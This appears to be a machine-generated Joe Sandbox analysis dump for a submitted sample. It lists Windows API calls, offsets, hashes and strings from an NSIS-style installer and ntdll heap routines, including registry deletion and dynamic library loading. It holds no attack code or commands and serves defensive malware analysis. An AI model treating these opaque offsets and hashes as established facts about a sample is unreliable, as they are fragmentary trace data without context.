                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3294113728-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
• Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                                                                                                                                                                                • API String ID: 3446177414-1222099010
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00429000,00000000,?,756A23A0,?,?,?,?,?,?,?,?,?,00402FBC,00000000,?), ref: 00404EB5
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00402FBC,00429000,00000000,?,756A23A0,?,?,?,?,?,?,?,?,?,00402FBC,00000000), ref: 00404EC5
                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(00429000,00402FBC,00402FBC,00429000,00000000,?,756A23A0), ref: 00404ED8
                                                                                                                                                                                                                                                                • SetWindowTextA.USER32(00429000,00429000), ref: 00404EEA
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F10
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F2A
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F38
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2531174081-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404762
                                                                                                                                                                                                                                                                • GetMessagePos.USER32 ref: 0040476A
                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00404784
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404796
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004047BC
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                • String ID: f
                                                                                                                                                                                                                                                                • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B5D
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(?,00000064,?), ref: 00402B88
                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00402B98
                                                                                                                                                                                                                                                                • SetWindowTextA.USER32(?,?), ref: 00402BA8
                                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BBA
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • verifying installer: %d%%, xrefs: 00402B92
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                                                • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                                                • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F93
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: lstrlenA.KERNEL32(00429000,00000000,?,756A23A0,?,?,?,?,?,?,?,?,?,00402FBC,00000000,?), ref: 00404EB5
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: lstrlenA.KERNEL32(00402FBC,00429000,00000000,?,756A23A0,?,?,?,?,?,?,?,?,?,00402FBC,00000000), ref: 00404EC5
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: lstrcatA.KERNEL32(00429000,00402FBC,00402FBC,00429000,00000000,?,756A23A0), ref: 00404ED8
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: SetWindowTextA.USER32(00429000,00429000), ref: 00404EEA
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F10
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F2A
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F38
                                                                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FA3
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                                                                                                                                                                • String ID: B
                                                                                                                                                                                                                                                                • API String ID: 2987980305-2386870291
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CharNextA.USER32(?,*?|<>/":,00000000,00434000,00435400,00435400,00000000,004030BA,00435400,756A3410,00403294), ref: 00405E54
                                                                                                                                                                                                                                                                • CharNextA.USER32(?,?,?,00000000), ref: 00405E61
                                                                                                                                                                                                                                                                • CharNextA.USER32(?,00434000,00435400,00435400,00000000,004030BA,00435400,756A3410,00403294), ref: 00405E66
                                                                                                                                                                                                                                                                • CharPrevA.USER32(?,?,00435400,00435400,00000000,004030BA,00435400,756A3410,00403294), ref: 00405E76
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                                • String ID: *?|<>/":
                                                                                                                                                                                                                                                                • API String ID: 589700163-165019052
                                                                                                                                                                                                                                                                • Opcode ID: 23e10a89c186aeb9d4ae81216154e90e4a11c9f17e12c8179a136c01dc061f6b
                                                                                                                                                                                                                                                                • Instruction ID: d9f26e5b90d06d21ed3ce52f9e74cde850698f16693a1e2037ff65b0147420f0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 23e10a89c186aeb9d4ae81216154e90e4a11c9f17e12c8179a136c01dc061f6b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E111C872804B9529EB3217348C44B777F99CB967A0F58047BE8D4722C2D67C5E428EAD
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,00000000,004093C0,00434800,00000000,00000000,00000031), ref: 0040177E
                                                                                                                                                                                                                                                                • CompareFileTime.KERNEL32(-00000014,?,004093C0,004093C0,00000000,00000000,004093C0,00434800,00000000,00000000,00000031), ref: 004017A8
                                                                                                                                                                                                                                                                  • Part of subcall function 00405B91: lstrcpynA.KERNEL32(?,?,00000400,00403152,0042DBA0,NSIS Error), ref: 00405B9E
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: lstrlenA.KERNEL32(00429000,00000000,?,756A23A0,?,?,?,?,?,?,?,?,?,00402FBC,00000000,?), ref: 00404EB5
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: lstrlenA.KERNEL32(00402FBC,00429000,00000000,?,756A23A0,?,?,?,?,?,?,?,?,?,00402FBC,00000000), ref: 00404EC5
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: lstrcatA.KERNEL32(00429000,00402FBC,00402FBC,00429000,00000000,?,756A23A0), ref: 00404ED8
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: SetWindowTextA.USER32(00429000,00429000), ref: 00404EEA
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F10
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F2A
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F38
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1941528284-0
                                                                                                                                                                                                                                                                • Opcode ID: 87cc0a09f9a596be3997dc95dd75862fa03618459af6fa845bb54b61416ad007
                                                                                                                                                                                                                                                                • Instruction ID: 4c0a073a0a50a016330575191a1a6545d3ec5be94f2f3c544cdbcd56c7493ec8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 87cc0a09f9a596be3997dc95dd75862fa03618459af6fa845bb54b61416ad007
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A941C371900515BADF10BBA9DC46DAF3679DF05368B20423BF421F20E2D77C5A419AAD
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A5E
                                                                                                                                                                                                                                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A9A
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402AA3
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402AC8
                                                                                                                                                                                                                                                                • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AE6
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1912718029-0
                                                                                                                                                                                                                                                                • Opcode ID: 6128ad1f95e0d45aeb4fc038169a3f4e17ade998af3df8cbe34db4d02bca8b11
                                                                                                                                                                                                                                                                • Instruction ID: 4f9eb0324db645217cd312817ce5f5f90673302cc8682bf6f7f2a23cea7074e4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6128ad1f95e0d45aeb4fc038169a3f4e17ade998af3df8cbe34db4d02bca8b11
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A3114C75A00008FFDF21AF90DE49EAF3B6DEB54348B104036FA05B10A0DBB49E51AF69
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?), ref: 00401CD0
                                                                                                                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00401CDD
                                                                                                                                                                                                                                                                • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CFE
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00401D1B
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                • Opcode ID: 61fc1dba9fda1762062bb2b77790a6befe8e60fa3738e2a0c52d9c777096eb7d
                                                                                                                                                                                                                                                                • Instruction ID: a37ff7ddff9b943901b48b8e13d91397296dd9e34982c61b5f8f3387a39b4807
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 61fc1dba9fda1762062bb2b77790a6befe8e60fa3738e2a0c52d9c777096eb7d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8F012B2A05115BFE701EBA4EE89DAF77BCEB44301B108576F501F2191C7749D018B79
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDC.USER32(?), ref: 00401D29
                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
                                                                                                                                                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401D56
                                                                                                                                                                                                                                                                • CreateFontIndirectA.GDI32(0040A7C8), ref: 00401DA1
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3808545654-0
                                                                                                                                                                                                                                                                • Opcode ID: 5c9cd3ac56969fe30278c88d56c25a930fef8193034729040990e91125b79c66
                                                                                                                                                                                                                                                                • Instruction ID: 2cbf7b26bffa346353c04d8a5f9262401d36b0fa9ffcbdeb30b58970b6715d39
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c9cd3ac56969fe30278c88d56c25a930fef8193034729040990e91125b79c66
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46018671955380AFEB019BB0AF0AB9A3FB4E715705F20843AF141BB2E2C5B95411DB2F
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
• Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
• API String ID: 3446177414-3610490719
APIs
Strings
• minkernel\ntdll\ldrinit.c, xrefs: 33969F2E
• Failed to allocated memory for shimmed module list, xrefs: 33969F1C
• LdrpCheckModule, xrefs: 33969F24
Memory Dump Source
• Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
• Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
• API String ID: 3446177414-161242083
APIs
• lstrlenA.KERNEL32(00429820,00429820,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404585,000000DF,0000040F,00000400,00000000), ref: 004046F3
• wsprintfA.USER32 ref: 004046FB
• SetDlgItemTextA.USER32(?,00429820), ref: 0040470E
Strings
Memory Dump Source
• Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
Similarity
• API ID: ItemTextlstrlenwsprintf
• String ID: %u.%u%s%s
• API String ID: 3540041739-3551169577
APIs
• SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
• SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C30
Strings
Memory Dump Source
• Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
Similarity
• API ID: MessageSend$Timeout
• String ID: !
• API String ID: 1777923405-2657877971
Memory Dump Source
• Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
• Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
Memory Dump Source
• Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
• Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID:
• API String ID: 3446177414-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
• Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                                                                                                • Opcode ID: 47166a070c635fc1b9e42bbeceba3772f34727c587edb11f746d8fc29e0becc9
                                                                                                                                                                                                                                                                • Instruction ID: 60423702780b62bc733517c101717ec6bc2b5c32474f71915738f18705cb6a76
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 47166a070c635fc1b9e42bbeceba3772f34727c587edb11f746d8fc29e0becc9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 845124B6E00219DFEF04CF99D845ADDBBB5BF48390F14812AE815BB2A0D735A901CF54
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
• Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4281723722-0
                                                                                                                                                                                                                                                                • Opcode ID: 28475c6741cf6616b2bd3fc31c139f92db9a1b277e203e340dbebc0ca4b04517
                                                                                                                                                                                                                                                                • Instruction ID: 1cb7c379528e080025316a3eb406910974d8bd587d21c380a2261b3dd0a7f6a4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 28475c6741cf6616b2bd3fc31c139f92db9a1b277e203e340dbebc0ca4b04517
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 743111B5E05318DFEF05EFA8D844A9EBBF5EB48321F10416AE921BB291CB315941CF50
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040235A
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00409BC0,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040237A
                                                                                                                                                                                                                                                                • RegSetValueExA.ADVAPI32(?,?,?,?,00409BC0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B3
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,00409BC0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseCreateValuelstrlen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1356686001-0
                                                                                                                                                                                                                                                                • Opcode ID: be294dc6e64afa6848476f7ead589d8a51d46e691ea1366307bbf61bada7ff34
                                                                                                                                                                                                                                                                • Instruction ID: 18d1fb4f89ff8b2d67b1f04eab716aa9824ced1508c62e5ffc4d870c518d25f3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be294dc6e64afa6848476f7ead589d8a51d46e691ea1366307bbf61bada7ff34
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F1190B1A00118BEEB10ABA5DE89EAF7678FB10358F10403AF905B61D0D7B86D01A668
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 004056BA: CharNextA.USER32(?,?,0042AC28,?,00405726,0042AC28,0042AC28,00435400,?,756A3410,00405471,?,00435400,756A3410,00000000), ref: 004056C8
                                                                                                                                                                                                                                                                  • Part of subcall function 004056BA: CharNextA.USER32(00000000), ref: 004056CD
                                                                                                                                                                                                                                                                  • Part of subcall function 004056BA: CharNextA.USER32(00000000), ref: 004056E1
                                                                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(00000000,00434800,00000000,00000000,000000F0), ref: 00401622
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmp
